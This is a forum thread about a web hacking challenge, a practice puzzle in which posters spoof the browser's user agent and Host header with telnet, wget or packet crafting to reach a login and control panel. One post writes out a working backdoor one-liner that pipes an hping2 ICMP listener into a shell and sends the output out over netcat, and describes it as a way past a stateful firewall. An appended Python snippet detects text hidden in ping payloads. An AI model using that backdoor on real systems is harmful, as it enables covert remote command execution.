xisto Community
jipman

Hackers Challenge 2: Do you have what it takes to beat this?


Notice from jipman:

Please don't give away the things you need to do to solve the challenges, this would spoil the puzzle for everyone. You may give hints, but not something like, 'download this and do this ... '

I hope you guys understand :P

In the previous topic ( http://forums.xisto.com/topic/83605-topic/?findpost=1064301480 ) I presented a so-called hackers challenge, and now I present to you the sequel.

I just felt like making another one and so I have. This one is more difficult than the first one.

You can find it here http://forums.xisto.com/no_longer_exists/

Final note: You have only really hacked this challenge when you see something like, 'here's the password'

If you think you have the right password, PM it to me and I'll add you to this list

Notice from jipman:

Here's a list of all people who have managed to hack this challenge:

- mastercomputers
- gentoo
- qwijibow
- moonwitch
- optykal
- Spectre


Excellent! I like these types of problems...

The only question is... should I re-program Firefox to report its version as 7.77, or should I do some TCP packet crafting?

Thanks for this... (although I AM supposed to be spending today teaching an artificial neural network to predict changes in the stock market)

AGH! My coursework will never be finished!


This is doing my egg in!!!

Last time I played this game, I just used telnet and fed it a special html request.

But this server is being annoying; it closes the connection as soon as I enter the GET line, before I manage to pass the Host variable.. and therefore I get a 404, because it's looking in the main Xisto folder (same IP address and all that).

I've tried passing the keep-alive part before I start typing out the GET, but that just kills the connection without any returned html code.

I can't be bothered to re-compile Firefox, so now I'm trying to make sense of hping.

Agh!


Okay.. now I'm obsessed!

So.. the server disconnects after the first transmission.

I've tried to put the whole request into a single transmission using \r and \n escape sequences, hoping they will be interpreted as a newline by the server. They are not.

So I captured the 3 important packets in an HTTP request, using ethereal. The first packet is a SYN packet, the second packet is an ACK, and the 3rd is the actual HTTP request.

I modified the 3rd packet to report Firefox version 7.77, then I sent out the SYN packet; when the server responded I sent the ACK packet... THEN I transmitted my modified HTTP packet.

So as far as the server is concerned, we have just done a handshake, and sent a request... but the reply tells me I'm not invited to the party.

At this point, I decided to cheat... I downloaded the Firefox plugin that automatically spoofs the user agent, I set it to spoof Firefox version 7.77 and I'm STILL not invited to the party...

Have you managed to pass this test yourself? I'm hoping you set it up wrong :P

Otherwise.. I give up.


pffttt that was easy LOL.... WAY easy!!! qwiji you're looking WAY too far LOL

You don't need Firefox to do it, FF just makes it slightly easier. But FF alone won't solve the issue though.


Well, I used the extension on FF. That's ONE.

BUT you need something from somewhere that you can get easiest using telnet :P


:P

I never said that you had to alter something in FireFox, but you guys are thinking too difficult.

But qwij, please remove those code snippets :P

Anyway, post here if you get it.


Damnit... stuck on the login...

This better not need SQL code injection, cos I suck at SQL as well as PHP.

I've tried some good ol' Bash insertion... but I'm pretty much stabbing in the dark... | head -n 20 and all that.

Can't you write the answers upside down on the bottom of each page like they do in the newspapers... I NEED to know.


I can get as far as the personal control panel using just Telnet, are there any limits to what we can use?

I'm currently at work, so limited in what I can try, but I guess this is good enough for a start. I'll finish it when I get back home.

Cheers,
MC

OK I was wrong, maybe my work computer does have enough to get through this.

You have hacked me :P, you win, the pass is ***********.

Cheers,
MC


How did you get through the first step with telnet??

OK, it's obvious that you need to pass a "User-Agent: Mozilla FireFox 7.77" and of course the "Host: jipman.astahost.com", but the server always kills off my telnet session the first time I hit return; it doesn't wait for more input. And \r\n don't seem to be interpreted as newlines by the server; they appear in 404ish server response.

To get past that phase I had to go hardcore, and capture handshake and HTTP packets, modify them, then write a little script to send them, and packet sniff the result.

Like jipman said, you don't need Firefox to complete the first stage, so I'm counting the plugin as cheating :P

So how did you do it with telnet???

Ohh, and thanks for this challenge... I've learned soooo much about hping2.

Did you know that you can use hping2 and netcat to penetrate firewalls!!!

For example, you could set up hping2 to sniff ICMP ping packets.. EVEN if the pings are blocked by the firewall, and disabled by the kernel, AND spoofed the from IP address, hping2 in packet sniffer mode will still get them.

You can set hping2 to sniff for ICMP ping packets containing a secret key. You pipe the output of hping to /bin/bash, then pipe the output of /bin/bash to netcat, which will transmit the output of the command back to you.

hping2 --listen mySecretSendCode --icmp -a Spoofed-Ip-Address | /bin/bash | netcat youHomeIP 80

The following will run any code implanted in a ping, as long as it contains your secret code, then send the output of the command back to you, on an innocent-looking TCP port 80!

Until today, I thought a stateful firewall dropping all unrelated, and unestablished, and new packets would protect me from a trojan.

How wrong I was...
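A defender's view of the ICMP trick described in the post above, as an added example that is not part of the thread: a payload check that flags echo requests carrying readable text instead of the filler a stock ping tool sends. The packets are constructed samples, `mySecretSendCode` is the placeholder signature from the post, and the Windows and Linux filler patterns are assumptions about those tools' defaults.

```python
import struct

def build_echo_request(payload: bytes) -> bytes:
    """Constructed IPv4 + ICMP echo request for the demo (checksums left at zero)."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, 1, 1) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0,
                     bytes([192, 0, 2, 10]), bytes([192, 0, 2, 20]))
    return ip + icmp

def echo_payload(packet: bytes):
    """Return the payload of an ICMP echo request, or None for any other packet."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    if ihl < 20 or packet[9] != 1 or len(packet) < ihl + 8 or packet[ihl] != 8:
        return None
    return packet[ihl + 8:]

def is_stock_filler(payload: bytes) -> bool:
    """Assumed defaults: Windows repeats 'a'..'w'; Linux iputils sends a
    16-byte timestamp followed by bytes counting up from 0x10."""
    n = len(payload)
    if payload == bytes(0x61 + i % 23 for i in range(n)):
        return True
    return n >= 16 and payload[16:] == bytes((0x10 + i) & 0xFF for i in range(n - 16))

def is_suspicious(packet: bytes, min_text_ratio: float = 0.9) -> bool:
    """Flag echo requests whose payload is mostly readable text, not stock filler."""
    payload = echo_payload(packet)
    if not payload or is_stock_filler(payload):
        return False
    text = sum(32 <= b < 127 or b in (9, 10, 13) for b in payload)
    return text / len(payload) >= min_text_ratio

# Constructed sample packets (not captured traffic).
SAMPLES = {
    "windows ping": build_echo_request(bytes(0x61 + i % 23 for i in range(32))),
    "linux ping": build_echo_request(bytes(16) + bytes(range(0x10, 0x38))),
    # Placeholder signature from the post followed by a harmless command string.
    "signature + text": build_echo_request(b"mySecretSendCode" + b"uptime\n"),
}

def scan(samples=SAMPLES):
    """Return the names of the samples that should raise an alert."""
    return [name for name, pkt in samples.items() if is_suspicious(pkt)]

if __name__ == "__main__":
    print(scan())
```

Tune `min_text_ratio` against a baseline of your own ping traffic before alerting on it.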


Bah !! This was jack$**** :P I got to the so called control panel in no time. You guys are thinking too hard.. Here's what I did.

 

1. Logged into my Xisto shell

2. Used wget to fetch the link with spoofed header:

I hope you don't mind me doing this mse, but i don't like to have answers posted here, that would spoil the puzzle for others :P

That gave me the header with a ticket number: xxx.xxx.xxx.xxx - and a login page - which I downloaded and edited to make the links absolute. When I tried to use this file to login, I faced the same user agent problem coz FireFox was still reporting wrong version - but I got the URL structure:

same here

 

3. So I used wget again to fetch the page with this URL

Sorry  :P

4. That got me to the so-called control panel which contained a page like this:

Welcome to your personal control panel

At this moment, you do not have permission to view the serverlogs yet, but you can see the who is logged in at this moment

 

Challenger (you) at Ip address: xxx

 

Jip Man at Ip address: xxx

 

Administrator at Ip address: xxx


BTW, you can use WannaBrowser too, to spoof the headers: http://forums.xisto.com/no_longer_exists/

 

That's it I guess :P


I've used wget almost every day.... how I wish I would have once read the man page and discovered the host spoofing!!!!!

Well... I suppose I just like packet crafting too much!

